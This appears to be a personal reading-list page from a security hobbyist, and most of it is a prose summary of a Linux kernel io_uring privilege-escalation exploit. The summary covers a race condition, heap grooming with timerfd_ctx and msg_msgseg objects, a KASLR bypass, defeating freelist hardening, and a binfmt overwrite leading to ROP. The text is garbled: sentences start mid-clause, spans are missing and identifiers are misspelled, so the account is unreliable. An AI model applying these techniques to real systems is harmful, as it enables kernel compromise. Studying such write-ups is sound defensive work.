People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
io_uring is a new subsystem in the Linux kernel used for speedy IO operations. In particular, the program may need to do privilege transitions many times via syscalls. Instead, a series of IO operations can be performed in parallel.io_req_init_async is called, it assigns its own identity to be the worker of the IO request. However, if two threads submit an IO request to the same io_uring at the same time, then they will be attached into the same work queue but with different IDs. The fact that the same identity is used for two different requests is what causes the very subtle security issue.CONFIG_HARDENDED_USERCOPY (which is enabled on the Container-Optimized OS), the function used to copy data from userland (copy_from_user) cannot be used across slot boundaries. So, the typically method of putting msg_msg and corrupting this will not work. It's possible to spray this area with objects we don't own but its not trivial.timerfd_ctx is within the kmalloc-256 slot and has plenty of pointers, making it a prime target for exploitation within our fake slot. From the fake slot, the author decided to use the upper and lower slots with the msg_msgseg object, which has mostly user controlled data.timerfd_ctx points back to itself (heap), leading to a nice leak from the msg_msgseg object. For breaking KASLR, arming the timer will set a function pointer which points to the .text section.CONFIG_SLAB_FREELIST_HARDENED flag is turned on, which is a type of pointer encoding that requires uses to know the storage address of the pointer, a random value and the new pointer itself. By filling up the entire slab, we can force the ptr to be NULL, leak it and calculate the random value to write the pointer ourselves.binfmt. The structures used for loading executables are writable! Using the primitive from above, the load_binary callback function can be abused to get PC control to ROP.tmpfs, which was not compatible with the exploit and we needed the O_DIRECT file flag to make this possible. Only a few files could be opened with this flag in the container and they were all very small, making the exploit unreliable.timerfd_ctx to ROP instead. Using this, the same controlled binfmt overwrite could be used to get code execution. Another novel technique that was used was to call msleep to gracefully end the ROP in the interrupt context to cause the program to not crash.